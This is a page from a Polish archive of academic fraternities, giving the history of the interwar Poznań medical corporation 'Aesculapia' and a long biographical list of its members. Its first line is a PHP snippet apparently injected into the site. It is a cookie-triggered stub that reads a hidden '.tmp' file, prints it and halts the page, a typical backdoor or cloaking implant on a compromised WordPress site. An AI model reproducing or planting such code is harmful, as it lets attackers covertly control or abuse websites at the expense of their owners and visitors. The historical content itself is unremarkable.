if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Aesculapia

Dekiel Alfonsa Wawrzyniaka Nazwa:
Akademicka Korporacja Medyków Uniwersytetu Poznańskiego „Aesculapia” w Poznaniu
Siedziba:
Poznań
Data powstania:
15 (?) X 1930 r.
Barwy:
purpurowa - błękitna - złota
Dewiza:
„Omnia pro humanitatis sanitate” (”Wszystko dla ludzkiego zdrowia”)

Rys historyczny

Banda rycerska Romana Drewsa oraz frakowa Aleksandra Brodniewicza, lata 30-te.

Aesculapia powstała dnia 15 (30?) X 1930 r. Była korporacją wydziałową i skupiała wyłącznie studentów Wydziału Lekarskiego Uniwersytetu Poznańskiego.

W maju 1931 r. korporacja została przyjęta do Związku Polskich Korporacji Akademickich (data starszeństwa związkowego: maj 1931 r.). Kandydowała pod opieką K! Chrobria. Prawa członka rzeczywistego uzyskała w 1933 r.

Dewizka Aleksandra Jakubowskiego, Poznań 1937 r.

Od połowy lat 30-tych członkowie Aesculapii pełnili funkcje w Prezydiach Poznańskiego Koła Międzykorporacyjnego. W 1935/1936 sekretarzem Koła był Zygmunt Gutter, a w 1936/1937 Bronisław Szczechowski pełnił funkcję wiceprezesa.

Komers Aesculapii, 1932 r.

Całkowita ustalona, choć niekompletna imienna lista członków Aesculapii obejmuje 101 nazwisk, w tym 23 członków honorowych.

Brak pewnych informacji dotyczących powojennej działalności Aesculapii, choć wiadomo, że odbywały się spotkania niewielkiej grupy Aesculapów w Poznaniu.

Lista członków

Poczet sztandarowy Aesculapii, lata 30-te.

Poniższa, niekompletna lista członków Aesculapii obejmuje ponad sto nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

Członkowie honorowi

 1. Birula-Białyniecki, dr, Filister honorowy Aesculapii [być może Teodor Białynicki-Birula (21 czerwca 1886 w Nowym Królewie na Witebszczyźnie - 13 lipca 1956 w Warszawie) absolwent (z wyróżnieniem) Akademii Medyko-Chirurgicznej w Sankt Petersburgu 1913, w czasie I wojny światowej w wojsku rosyjskim, następnie WP, od 1928 kierował Sanatorium Przeciwgruźliczym Pocztowców w Zakopanem, od 1933 dyrektor sanatorium w Chodzieży, po wojnie dyrektor Sanatorium Nauczycielskiego w Zakopanym, odznaczony m.in. Złotym Krzyżem Zasługi, członek honorowy Polskiego Towarzystwa Ftyzjatrycznego 1956
 2. Kazimierz Boesche, (3 marca 1906 w Śremie - 1940 w Charkowie) s. Józefa, dr med., Filister honorowy Aesculapii, ppor. WP, w wojnie obronnej 1939 w 7 Szpitalu Okręgowym, w niewoli sowieckiej, zamordowany przez NKWD
 3. Stefan Józef Borowiecki, (20 sierpnia 1881 w Warszawie - 8 września 1937) s. Alfreda, uczeń V Gimnazjum w Warszawie, student med. UW, neurolog, psychiatra, habilitacja 1917, od 1921 prof. nadzw. UP, dziekan Wydziału Lekarskiego 1929/30
 4. Stanisław (Czesław) Bylina, (8 maja 1903 w Stryju - 1978) s. Józefa i Jadwigi, student i absolwent jako dr med. 1927 UP, laryngolog i chirurg, w latach 30-tych w Klinice Chirurgicznej UP, Filister honorowy Aesculapii, pierwszy sekretarz Koła Filistrów 1938, w czasie okupacji w AK ps. “Adam”, prowadził Prywatną Lecznicę Chirurgiczną w Jaśle, w 1956 lekarz w Warszawie
 5. Dawidowski, chirurg, założyciel i Filister honorowy Aesculapii

  Stefan Dąbrowski, 1932 r.

 6. Stefan Tytus Zygmunt Dąbrowski, (31 stycznia 1877 - 23 marca 1947) członek zarządu Związku Młodzieży Polskiej “Zet” 1895-1900, lekarz i biochemik, prof. Akademii Rolniczej w Dublanach 1910-13, prof. chemii i fizjologii żywienia WMW we Lwowie 1913-19, prof. chemii fizjologicznej UP 1919-46, wybrany na rektora UP 1939, rektor UP 1945-46, jego kadencja została przerwana, gdy został urlopowany z przyczyn politycznych za udostępnienie auli młodzieży katolickiej, członek PAU 1928, działacz polityczny związany z Narodową Demokracją, od 1905 członek Ligi Narodowej, wiceminister spraw zagranicznych 1920-21, poseł na Sejm RP 1922-35, członkiem komisji sejmowych: zdrowia, spraw zagranicznych i wojska (1922-1927), kurator i Filister honorowy Aesculapii

 7. Paweł Gantkowski, (28 grudnia 1869 w Gnieźnie - 1938 w Poznaniu) studiował we Wrocławiu, Monachium, Würzburgu; dziekan Wydziału Lekarskiego UP 1930/31, naczelnik Izby Lekarskiej Poznańsko-Pomorskiej 1929-34, wiceprezes Naczelnej Izby Lekarskiej w Warszawie, założyciel Towarzystwa Higienicznego - Oddziału Polskiego TH w Poznaniu 1925, założyciel i Filister honorowy Aesculapii, autor licznych publikacji z zakresu higieny, w Poznaniu istnieje ulica jego imienia
 8. Wincenty Jezierski, (15 stycznia 1874 w Pleszewie - 21 listopada 1945 w Poznaniu) absolwent Królewskiego Gimnazjum w Ostrowie, student med. na uniwersytetach we Wrocławiu, Heidelbergu, Fryburgu, dr med. 1903, internista, członek komisji powołanej w 1918 dla zorganizowania Wydziału Lekarskiego UP, prof. 1920, dziekan Wydziału 1927/28, założyciel i Filister honorowy Aesculapii, w 1939 wysiedlony do Słupcy

  Antoni Jurasz, 1939 r.

 9. Antoni Tomasz Jurasz, (11 lutego 1882 w Heidelbergu - 20 września 1961 w Nowym Yorku) s. Antoniego, chirurg, prof. UP, Filister honorowy Aesculapii, w czasie wojny organizator i dziekan Polskiego Wydziału Lekarskiego w Edynburgu, członek PAU

 10. Bolesław Marceli Kowalski, (26 września 1885 - 3 grudnia 1945) lekarz, ginekolog i położnik, prof. UP, współorganizator i ordynator Kliniki Ginekologiczno-Położniczej przy ul. Polnej w Poznaniu, kierownik Katedry i Kliniki Położnictwa i Ginekologii UP, twórca poznańskiej szkoły położniczo-ginekologicznej, założyciel i Filister honorowy Aesculapii, w czasie wojny wykładowca tajnego Uniwersytetu Ziem Zachodnich
 11. Stanisław Kryzan, (1877 w Ostrów Wielkopolski - 1969 w Starogard Gdański) absolwent Królewskiego Gimnazjum w Ostrowie 1897, dr med., psychiatra, dyrektor szpitala psychiatrycznego w Kocborowie (obecnie imienia dra Kryzana), odznaczony m.in. papieskim medalem Pro Ecclesia et Pontifice, Krzyżem Kawalerskim OOP, Złoty Krzyż Zasługi, jugosłowiańską Komandorią Orderu św. Sawy, Filister honorowy Aesculapii
 12. Franciszek Łabendziński, (9 października 1887 w Poznaniu - 1 lutego 1964 w Poznaniu) s. Jana i Bronisławy z Sypniewskich, absolwent Gimnazjum św. Marii Magdaleny w Poznaniu 1906, studiował med. w Berlinie, Paryżu, Strasburgu i Monachium, dr med. Monachium 1912, internista, lekarz WP 1920-21, wykładowca, a od 1939 prof. tytularny UP, trzeci kurator i Filister honorowy Icarii, Filister honorowy Aesculapii, w 1939 ordynator oddziału szpitala polowego w wojnie obronnej 1939, w 1939 wysiedlony do Generalnej Guberni, w czasie II wojny światowej wykładowca kieleckiego oddziału Tajnego Uniwersytetu Ziem Zachodnich w Warszawie, po wojnie prof. UP, prof. zw. 1956, pochowany na Cmentarzu Junikowskim w Poznaniu
 13. Romuald Edward Matuszewski, dr med., doc. UP, Filister honorowy Aesculapii, drugi prezes Koła Filistrów 1938-39

  Karol Mayer (?), 1933 r.

 14. Karol Hieronim Mayer, (17 października 1882 w Szilagy-Kraszno w Siedmiogrodzie - 22 sierpnia 1946 w Poznaniu) s. Dominika i Józefy Kobusz, doc. med. wewnętrznej UJ 1917, radiolog, prof. UP 1921-46, członek PAU 1945, Filister honorowy Aesculapii, prawd. Filister honorowy Sigismundii

  Czesław Meissner, 1932 r.

 15. Czesław Meissner, (9 września 1879 - 29 maja 1950) z rodziny ziemiańskiej, s. Wojciecha i Kazimiery z Hundutów, absolwent Gimnazjum św. Marii Magdaleny w Poznaniu 1899, student med. w Greifswaldzie i Monachium, dr med. Monachium 1905, działacz polityczny związany z Narodową Demokracją, prezes Rady Ludowej w Poznaniu 1918, w czasie powstania wielkopolskiego organizator polskiej administracji i zaopatrzenia oddziałów powstańczych, od 1919 poseł na Sejm, senator 1930-35, prezes zarządu okręgowego Stronnictwa Narodowego w Poznaniu 1928-39, założyciel i Filister honorowy Aesculapii, pierwszy wiceprezes Kola Filistrów 1932-38, w wojnie obronnej 1939 przy organizacji szpitali zapasowych, w 1940 pełnomocnik Ministerstwa Spraw Wojskowych ds. PCK we Francji, po zajęciu Francji przez Niemców organizator szpitali i przychodni lekarskich dla rodzin wojskowych oraz domów wypoczynkowych dla żołnierzy polskich, działacz Stronnictwa Narodowego na emigracji, w 1946 wrócił do kraju

 16. Edward Feliks Lubicz-Niezabitowski, (30 maja 1875 w Bugaju k. Miłosławia - 5 listopada 1946 w Poznaniu) [1874-1958 ?] student med. i przyrody UJ 1894-1902, doktorat 1900, naukowiec, zoolog i lekarz, lekarz i prof., a następnie dyrektor 1918-21 w Państwowym Gimnazjum w Nowym Targu 1905-21, prof. UP 1921-39 i 1945-46, rektor 1928-29, kurator i Filister honorowy Demetrii, Filister honorowy Aesculapii, dyrektor Muzeum Przyrodniczego w Poznaniu 1921-39, w czasie okupacji lekarz w Warszawie, w aktywny w tajnym nauczaniu 1940-45, członek korespondent PAU, autor 150 prac naukowym, głównie z zakresu zoologii, honorowy obywatel Nowego Targu
 17. Leon Padlewski, (27 kwietnia 1870 w Odessie - 8 września 1943 w Warszawie) student w Petersburgu, po studiach m.in. zastępca dyrektora Instytutu Bakteriologicznego przy Uniwersytecie Moskiewskim 1908-14, prof. mikrobiologii lekarskiej UP 1922-38, prof. higieny UP 1934-37, dziekan Wydziału Lekarskiego UP 1931-33 i 1939, uhonorowany srebrnym medalem Instytutu Pasteura 1911, członek korespondent PAU 1931, założyciel i Filister honorowy Aesculapii

  Feliks Skubiszewski, 1932 r.

 18. Feliks Skubiszewski, (15 maja 1895 w Czemiernikach k. Lubartowa - 17 maja 1987 w Lublinie) s. Marcina, brat Ludwika (Aesculapia), absolwent rosyjskiego Gimnazjum Męskiego w Lublinie 1914, student med. w Moskwie i Kijowie, dr med. UW 1924, chirurg, habilitacja UP 1931, kurator i Filister honorowy Aesculapii, w czasie okupacji wysiedlony z Poznania, od sierpnia 1944 jako mjr LWP p.o. naczelnego chirurga Departamentu Służby Zdrowia, organizator UMCS 1944, prof. nadzw. UMCS, prof. zw. 1948, dziekan Wydziału Lekarskiego 1945-47, prorektor 1947-48, rektor AM w Lublinie 1950-54, doktor honoris causa AM w Lublinie, wieloletni członek KW PZPR w Lublinie, pochowany na Cmentarzu w Czemiernikach

  Ludwik Skubiszewski, 1932 r.

 19. Ludwik Skubiszewski, (7 sierpnia 1886 w Czemiernikach k. Lubartowa - 7 grudnia 1957 w Poznaniu) s. Marcina (drobnego właściciela ziemskiego) i Józefy z d. Kozak, brat Feliksa (Aesculapia), uczeń rosyjskiego Gimnazjum Męskiego w Lublinie, wydalony za działalność w tajnych organizacjach patriotycznych, po amnestii absolwent Gimnazjum w Białej Podlaskiej, student med. w Warszawie i Kijowie, dr med. 1917, od 1922 zastępca prof. anatomii i histologii patologicznej UP, habilitacja UW 1923, od 1924 prof. nadzw., założyciel i Filister honorowy Aesculapii, pierwszy Prezes Koła Filistrów 1932-38, w 1939 wysiedlony do Generalnej Guberni, prof. UP/AM w Poznaniu 1950-51, gdy przeszedł na emeryturę, od 1951 do śmierci prosektor Wojewódzkiego Szpitala Dziecięcego, ożeniony z Anielą z d. Leitgeber, ojciec ojciec Marii (zamężna Święszkowska), Krzysztofa (profesora prawa) i Piotra (profesora historii sztuki), pochowany na cmentarzu przy ul. Wojciechowskiego w Poznaniu

 20. Tadeusz Suwalski, dr med., chirurg, założyciel i Filister honorowy Aesculapii, po wojnie ordynator Oddziału Chirurgicznego Szpitala Dziecięcego w Poznaniu
 21. Władysław Suwalski, lekarz med., ginekolog i położnik, założyciel i Filister honorowy Aesculapii, drugi wiceprezes Koła Filistrów 1938-39
 22. Antoni (Stanisław) Szac, dr med., Filister honorowy Aesculapii, pierwszy skarbnik Koła Filistrów 1932-38

  Tadeusz Żuralski, lata 30-te.

 23. Tadeusz Żuralski, (14 września 1894 w Biskupcu Warmińskim - 1940 w Katyniu) herbu Godziemba, s. Walentego (lekarza) i Wandy z Koźmińskich, dalsza rodzina Alfonsa (Chrobria) i Jerzego (Baltia), uczeń gimnazjów w Olsztynie, Chojnicach i Gdańsku, absolwent Gimnazjum w Gdańsku, studiował med. w Berlinie, Monachium, Rostoku i Królewcu, w czasie I wojny światowej lekarz wojskowy na frontach bałkańskich 1916-18, odznaczony Krzyżem Żelaznym, lekarz-asystent w klinice ginekologicznej w Królewcu, dr med. Królewiec 1920, od 1920 lekarz-asystent dyrektora dr Łazarkiewicza w Krajowej Klinice dla Kobiet UP, od 1925 prymariusz u prof. Kowalskiego, w 1925 ukończył kurs oficerów rez. WP, ppor. rez., habilitacja UP 1928, od 1929 doc. med. UP, od 1930 dyrektor szpitala ginekologicznego Ubezpieczalni Społecznej w Poznaniu, od 1931 właściciel prywatnej kliniki ginekologiczno-położniczej początkowo przy ul. Fredry 8, a następnie Chopina 4, członek Zarządu Okręgu Wielkopolskiego PCK, Filister honorowy Aesculapii, odznaczony Medalem 10-lecia Niepodległości 1929, Złotym Medalem Krzewienia Ubezpieczeń Społecznych, przydzielony do 7 Szpitala Okręgowego WP, z którym odbył kampanię wrześniową 1939, w niewoli sowieckiej, zamordowany przez NKWD

Członkowie rzeczywiści

 1. Marian Abram, (18 czerwca 1912 w Wągrowcu - 25 czerwca 1991) student i absolwent 1939 med. UP, skarbnik sem. let. 1936/37, skarbnik sem. zim. 1937/38, internista
 2. Walter (Witold Maksymilian ?) Antes, (10 listopada 1910 w Żernikach - ) student i absolwent 1936 med. UP, dr med. UWr. 1949, chirurg
 3. Baniecki, ( - 1939-1945) sekretarz Koła Filistrów 1938-39, ścięty przez Niemców
 4. Jan Barański, prezes 1932
 5. Ignacy Bąk, student i absolwent 1935 (?) med. UP
 6. Zygfryd Bieda, (22 kwietnia 1910 w Tucholi - lata 60-te) student i absolwent 1947 med. UP, akt. 1935-39, sekretarz sem. let. 1936/37 oraz sem. zim. 1937/38, radiolog
 7. Albin Bielicki, akt. 1935
 8. Paweł Jan Błaszkiewicz, (24 czerwca 1911 w Człuchowie - 1990) student med. UP, absolwent Warszawa 1940
 9. Bogdan Marian Bogacki, (9 października 1912 w Senftenberg - 1994?) student i absolwent 1937 UP, sekretarz 1932/33, dr med., chirurg, w 1956 adiunkt w Klinice Chirurgii AM w Poznaniu
 10. Aleksander Brodniewicz, (1904-1986) student i absolwent 1932 med. UP, prezes sem. zim. i sem. let. 1931/32, dr med., m.in. naczelnik Wydziału Higieny Komunalnej w Ministerstwie Zdrowia i Opieki Społecznej, autor wielu publikacji z zakresu higieny
 11. Czesław Bunikowski, (18 maja 1908 w Głuchych k. Starogardu - ) student i absolwent 1936 med. UP, ftyzjatra, w 1956 kierownik Przychodni Przeciwgruźliczej w Brodnicy

  Wacław Burakowski, druga poł. lat 30-tych.

 12. Wacław Burakowski, ( - 1 listopada 1916 w Piotrkowie Trybunalskim - 1990) s. Mikołaja i Mariii z d. Wilczyńska, brat Tadeusza i Kazimierza (obaj Grunwaldja), student i absolwent med. UP 1950, sekretarz sem. let. 1938/39, ftyzjatra, w 1956 dyrektor Sanatorium Przeciwgruźliczego w Gostyninie

 13. Marian Hieronim Chylewski, (1909-1965) akt. 1931-35, sekretetarz sem. zim. 1931/32
 14. Jan Cieśliński, akt. 1935-37, wiceprezezes sem. zim. 1936/37, chirurg
 15. Wacław Czerwiński, akt. 1935
 16. Marian Dębicki, (2 lutego 1911 - 1997) student i absolwent med. UP, akt. 1932-35, olderman 1932/33, członek Zarządu Koła Medyków 1931/32, dr med. UP 1947, chirurg
 17. Roman Drews, (6 sierpnia 1908 w Chodzieży - 17 kwietnia 1977 w Poznaniu) absolwent Państwowego Gimnazjum św. Barbary w Chodzieży 1927, student i absolwent med. UP 1927-33, asystent w Klinice Chirurgicznej UP, w 1939 wysiedlony z Poznania, po wojnie prof. UP/AM w Poznaniu, rektor AM w Poznaniu, Honorowy Obywatel Miasta Chodzieży 1962
 18. Alfred Duszyński,
 19. Przemysław Karol Duś (Duś-Dobrzański), (21 października 1914 w Lublinie - ) student med. UP, akt. 1934-39, prezes sem. let. 1938/39, prezes MNR, absolwent med. Warszawa 1940, ftyzjatra, w 1956 lekarz w Wałbrzychu

  Stanisław Dzieciuchowicz, 1937 r.

 20. Stanisław Dzieciuchowicz, (30 października 1907 we Wrześni - 1 października 1972) brat Seweryna (Filomatia Posnaniensis), student i absolwent 1933 med. UP, prezes sem. let. 1930/31, prezes Koła Medyków 1931/32, członek Zarządu Ogólnopolskiego Związku Akademickiego Towarzystw Medycznych 1932, dr med. UP 1937, w 1956 kierownik Wydziału Zdrowia w Zielonej Górze, później dyrektor Szpitala w Puszczykowie, pochowany na cmentarzu na Junikowie w Poznaniu

 21. Stanisław Figaszewski, (1917-1998) student med. UP
 22. Stanisław Fijałkowski, (24 listopada 1911 w Łodzi - ) student i absolwent 1945 med. UP, skarbnik sem. let. 1935/36, dr med. AM w Łodzi 1952, chirurg, w 1956 dyrektor Szpitala i Ordynator Oddziału Chirurgii w Zgierzu
 23. Edmund Geppert, akt. 1935
 24. Zenon Głogowski, (1912 - ) akt. 1935
 25. Antoni Gościński, wiceprezes 1931, prezes Koła Medyków 1931
 26. Jan Gościński,
 27. Konrad Grabowski, (19 sierpnia 1910 w miejsc. Gardej - ) student i absolwent 1949 med. UP, wiceprezes sem. let. 1938/39

  Józef Granatowicz, 1939 r.

 28. Józef Władysław Granatowicz (24 maja 1901 w Mainz - 24 listopada 1978 w Poznaniu) s. Stefana i Kazimiery z d. Krąkowska, brat Jana (Korpus Zawisza Czarny), absolwent Gimnazjum im. K. Marcinkowskiego w Poznaniu, uczestnik wojny polsko-bolszewickiej 1920, student i absolwent med. UP 1920-27, dr med., chirurg, lekarz w Szpitalu Kolejowym w Poznaniu 1927-30, a następnie starszy asystent i adiunkt działu onkologicznego w Klinice Chirurgicznej UP 1930-39, pobłęgiał wiedzę nw klinikach uniwersyteckich w Sztokholmie, Hamburgu i Wiedniu, latem 1939 złożył na UP pracę habilitacyjną, która zaginęła w czasie wojny, w wojnie obronnej 1939 w Wojskowym Szpitalu Ujazdowskim, odznaczony Krzyżem Walecznych, w czasie okupacji orydnator Oddziału Chirurgicznego w Klinice Omega w Warszawie, w czasie powstania warszawskiego dowódca szpitala powstańczego, po powstaniu ewakuował szpital wraz z rannymi do Brwinowa k. Warszawy, po wojnie kierownik Kliniki Chirurgicznej UP, dyrektor Szpitala SS. Elżbietanek w Poznaniu i ordynator Oddziału Chirurgicznego 1946-48, a po jego upaństwowieniu organizator i dyrektor Szpitala Miejskiego nr 2 im. Franciszka Raszeji i ordynator Oddziału Chirugicznego 1949-66, od 1960 działacz przeciwtytoniowy, m.in. współzałożyciel Krajowej Komisji ds. Zwalczania Palenia Tytoniu oraz Społecznego Komitetu Zwalczania Palenia Tytoniu w Warszawie, pochowany na Cmentrzu na Miłostowie, za pomoc rannym po powstaniu poznańskim 1956 odznaczony pośmiertnie Krzyżem Oficerskim OOP

  Stanisław Grochmal, lata 30-te.

 29. Stanisław Józef Grochmal, (13 kwietnia 1911 w miejsc. Jureczkowa w pow. dobromilskim w woj. lwowskim - 17 kwietnia 1995 w Krakowie) s. Michała i Heleny z Zająców, absolwent Gimnazjum w Krośnie 1929, student i absolwent med. UP 1929-35, akt. 1931-35, sekretarz 1931, Honorowy Obywatel Krosna i Zasłużony Obywatel Miasta Krakowa, dr med. UP 1937 (1935 ?), neurolog, w wojnie obronnej 1939 naczelny lekarz 16 Pułku Piechoty, w czasie wojny w konspiracji ps. “Lechita”, m.in. organizował opiekę lekarską dla oddziałów partyzanckich, po wojnie pracownik naukowy WSWF, habilitacja 1962, prof. i rektor 1965-68 WSWF, od 1972 kierownik Oddziału Rehabilitacji Instytutu Neurologii AM w Krakowie, odznaczony m.in. Krzyżem Srebrnym Orderu Virtuti Militari, Krzyżem Walecznych, Honorowy Obywatel Miasta Krosna 1978, Zasłużony Obywatel Miasta Krakowa 1984, pośmiertnie awansowany na ppłk. WP

 30. Roman (Stefan) Grodzicki, wiceprezes sem. let. 1930/31, olderman sem. let. 1931/32
 31. Edward Grotkowski, (9 października 1909 w Cleveland w Stanach Zjednoczonych - ) student i absolwent 1936 med. UP, akt. 1935, w 1956 kierownik Ośrodka Zdrowia w Jabłonowie
 32. Zbigniew Gutter, (1912 - 1 czerwca 1999 w Edmonton) student i absolwent UP, c. 1931, akt. 1931-38, sekretarz sem. let. 1935/36, prezes sem. zim. 1936/37, sem. let. 1936/37, sem. zim. 1937/38, sekretarz PKM 1935/36, działacz ONR, dr med., elektroradiolog
 33. Bogdan Hermanowski, (2 września 1913 w Lublinie - 1969) student i absolwent 1945 med. UP, płk
 34. Henryk Iżyniec, akt. 1935

  Aleksander Jakubowski, lata 30-te.

 35. Aleksander Jakubowski, (4 stycznia 1910 w Orenburgu w Rosji - 18 maja 1982 w Gidlach) z rodziny szlacheckiej herbu Topór, s. Mieczysława i Cecylii z Jędrychowskich, absolwent Gimnazjum w Bydgoszczy 1928, student i absolwent 1935 med. UP, akt. 1933-35, wiceprezes 1933, prezes sem. zim. 1933/34, olderman sem. let. 1937/38, prowadził dział lekarski w “Kurierze Poznańskim”, ftyzjatra, uczestnik wojny obronnej 1939, zbiegł w niewoli sowieckiej, w czasie okupacji członek ZWZ-AK, udzielał pomocy lekarskiej oddziałom partyzanckim AK, GL/AL, BCh, PPS i NSZ, po wojnie m.in. dyrektor Szpitala Miejskiego i Sanatorium Przeciwgruźliczego w Gidlach w pow. radomskim, wraz z żoną zorganizował budowę Centrum Zdrowia w Gidlach, na tablicy pamiątkowej przy wejściu do Centrum w nawiązaniu do dewizy Aesculapii umieścił napis “Servitudo Pro Humanitatis Sanitate”, pochowany na Cmentarzu w Gidlach, odznaczony m.in. Krzyżem Partyzanckim, Złotym Krzyżem Zasługi i Krzyżem Kawalerskim OOP

  [Źródła (poza wskazanymi poniżej spisu członków): relacja Jana Jakubowskiego]

 36. Klemens Jankiewicz, akt. 1935
 37. Jan Jaśtak, akt. 1935
 38. Witold Jeszke, (10 września 1911 w Bieżynie - 23 lutego 1972) student i absolwent 1939 med. UP, członek Zarządu 1931/32 oraz prezes 1935/36 Koła Medyków, redaktor “Życia Medycznego”, dr med. UP 1945, radiolog, po wojnie dyrektor Szpitala przy ul. Słowackiego w Poznaniu
 39. Tadeusz Kapuściński,
 40. Tadeusz Kołakowski, (16 lipca 1916 w Częstochowie - ) działacz ONR
 41. Jan Kowalczyk,
 42. Joachim Kowalski, akt. 1935
 43. Aleksy Krokowicz, (21 września w 1915 w miejsc. Lubośnia pow. Łask - 25 sierpnia 1988 w Poznaniu) s. Władysława i Janiny z d. Szafran, absolwent Prywatnego Gimnazjum Kołakowskiego w Piotrkowie Trybunalskim, student i absolwent UP 1933-1939 (dyplom 1945), uczestnik obrony Warszawy 1939, w czasie okupacji chirurg w szpitalu w Radomsku, równocześnie chirurg oddziału ZWZ-AK Floriana Budniaka “Andrzeja” w stopniu por. ps. “Jodła”, po wojnie pracownik UP, a następnie AM w Poznaniu, dr med. UP 1950, habilitacja 1962, profesor 1977, wieloletni kierownik III Katedry Chirurgii, członek ZBOWiD, radny Miejskiej Rady Narodowej 1960-85, odznaczony Krzyżem Walecznych, Krzyżem Partyzanckim, Krzyżem Kawalerskim OOP, pochowany na cmentarzu na Górczynie w Poznaniu
 44. Adam Kruppik, (2 sierpnia 1915 w Komornikach - 1980 w Kościanie) brat Edmunda (Aesculapia), student i absolwent 1946 med. UP, sekretarz sem. let. 1937/38 oraz sem. zim. 1938/39, pediatra

  Edmund Kruppik, ok. 1931/32 r.

 45. Edmund Kruppik, (16 września 1910 w Komornikach - 1982) brat Adama (Aesculapia), student i absolwent 1934 med. UP, sekretarz sem. let. 1930/31, wiceprezes sem. zim. i sem. let. 1931/32, prezes 1932/33, dr med. UP, ginekolog-położnik, po wojnie kierownik Ośrodka Zdrowia w Obrzycku

 46. Marian Krzyżanowski, (2 grudnia 1908 - ) student i absolwent 1936 med. UP, skarbnik 1931/32 oraz 1932, prezes 1933, dr med. UP 1948, skarbnik Koła Filistrów 1938-39
 47. Ignacy Kubiak, akt. 1935
 48. Stefan Kubicki, (25 czerwca 1916 w Stęszewie - 1968) s. Stanisława i Łucji Bolińskiej, student i absolwent 1945 med. UP, dr med. 1947, internista, gastrolog, habilitacja 1951, prof. AM w Warszawie
 49. Leon Landowski, (23 stycznia 1911 w Lembergu pow. Brodnica - ) student i absolwent 1939 med. UP, akt. 1935, internista
 50. Józef Łuczak, (4 lutego 1917 w Poznaniu - 1978) student i absolwent 1945 med. UP, wiceprezes, prezes sem. let. 1937/38, prezes sem. zim. 1938/39, olderman sem. let. 1938/39, dr med. UP 1948, okulista, w 1956 lekarz w Kościanie
 51. Maciejowski, [być może Alfons Antoni Maciejewski (9 maja 1906 w Kowalewie w pow. Wąbrzeźno - ) student i absolwent 1932 med. UP, dr med., chirurg ortopeda, w 1956 dyrektor Szpitala im. J. Wierzejewskiego w Poznaniu]
 52. Józef Włodzimierz Maciejewski, (31 października 1910 w Dreźnie - lata 70-te) student i absolwent 1935 med. UP, akt. 1933-35, prezes sem. zim. 1933/34, dr med. 1937 UP, internista, kardiolog
 53. Zygmunt Maciński, akt. 1935
 54. Zenon Meissnerowski,
 55. Marian Myszka,
 56. Stefan Myszka, (29 listopada 1908 w Kolonii - 1976) student i absolwent 1938 med. UP, akt. 1935, chirurg, w 1956 lekarz w Toruniu
 57. Tadeusz Olasek,
 58. Edward Pusty (po wojnie Radosławski), (10 marca 1911 w Częstochowie - 1980) student i absolwent 1932 med. UP, akt. 1935, radiolog, w 1956 lekarz w Częstochowie
 59. Bogdan Rowiński, (2 listopada 1903 w Ostrowie Wlkp. - ) s. Stefana, absolwent Gimnazjum w Ostrowie Wlkp. 1924, olderman sem. let. 1930/31 oraz sem. zim. 1931/32
 60. Stanisław Rydlewski, (1918-1979) wiceprezes sem. let. 1937/38, wiceprezes sem. zim. 1938/39, w czasie II wojny światowej żołnierz I Powietrznej Brygady Spadochronowej, po wojnie na emigracji w Wielkiej Brytanii, działacz polonijny
 61. Florian Sieradzki, (16 listopada 1914 w Żernikach - ) student i absolwent 1948 med. UP, dr med. 1950 UP
 62. Henryk Sierakowski, (2 kwietnia 1912 w Kowlu -8 listopada 1979 w Łowiczu) student i absolwent 1938 med. UP, internista, po wojnie pracował we Włocławku, w 1939 organizował punkt sanitarny w Pacynie k. Kutna, po wojnie lekarz w Łowiczu, m.in. Kierownik Powiatowego Wydziału Zdrowia w Łowiczu, ordynator Szpitala Dziecięcego i Zakaźnego w Łowiczu, kierownik Przychodni PKP w Łowiczu
 63. Lech Siuda, (2 stycznia 1909 w Lesznie - 1997) brat Zbigniewa (Aesculapia), student i absolwent 1932 med. UP, dr med. UP 1932, w 1956 lekarz w Buku pow. Nowy Tomyśl
 64. Zbigniew Siuda, ( - ok. 2000 w Londynie) brat Lecha (Aesculapia), po wojnie na emigracji w Wielkiej Brytanii
 65. Alfons Ludwik Skibicki, (7 sierpnia 1909 w Krążnie - ) student i absolwent 1937 med. UP, wiceprezes sem. zim. 1933/34, w 1956 lekarz w Czaszkowie w woj. poznańskim
 66. Franciszek Sokołowski, (26 lutego 1917 w Raciborzu - 1980) student i absolwent 1946 med. UP, dr med. UP 1948, wenerolog, w 1956 lekarz w Poznaniu
 67. Filip Antoni Struś, (16 maja 1911 w Kowlu - 1940 w Katyniu) s. Jana, lekarz w Poznaniu, ppor. rez. służby zdrowia, w wojnie obronnej 1939 w 7 Szpitalu Okręgowym, w niewoli sowieckiej, zamordowany przez NKWD

  Bronisław Szczechowski, lata 30-te.

 68. Bronisław Szczechowski, (20 listopada 1912 w Berlinie - 1984) student i absolwent 1937 med. UP, sekretarz sem. zim. 1933/34, prezes 1934/35, prezes sem. let. 1935/36, wiceprezes PKM 1936/37, dr med. UP 1949, internista, w 1956 lekarz w Bytomiu

  Teofil Szkopek, 1937 r.

 69. Teofil Szkopek, (12 grudnia 1914 w Inowrocławiu - 1986) student i absolwent 1948 med. UP, chirurg, w 1956 lekarz w Prudniku

 70. Piotr Szrajda,

  Gerwazy Świderski, 1938/39 r.

 71. Gerwazy Świderski, (26 maja 1920 w Kobylinie w Wielkopolsce - ) herbu Pogoń i Lubicz, s. Stanisława (przemysłowca w branży budowlanej i rolniczej) i Anny z Orlickich, absolwent Gimnazjum im. Hugona Kołłątaja w Krotoszynie 1938, student i absolwent 1949 med. UP, w czasie okupacji asystent med. w Szpitalu w Marysinie 1939-41, urzędnik biurowy w Zespole Majątków Rolnych 1941-43, współpracownik na oddziale chirurgii w szpitalu (?) w Krotoszynie 1943-46, dr med. AM w Poznaniu 1951, docent 1960, prof. 1985, specjalizacje z ortopedii i traumatologii, asystent i doc. Kliniki Ortopedii AM w Poznaniu 1951-73, dyrektor Kliniki Ortopedii i Spondyliatrii AM we Wrocławiu 1973-90, od 1991 dyrektor Kliniki Chorób i Urazów Kręgosłupa we Wrocłąwiu, ppor. 2002, odznaczony m.in. Krzyżem Walecznych, Krzyżem Oficerskim OOP, czeskim Orderem ze Wstęgą Cesarza Karola IV, Złotym Laurem z Diamentami RP

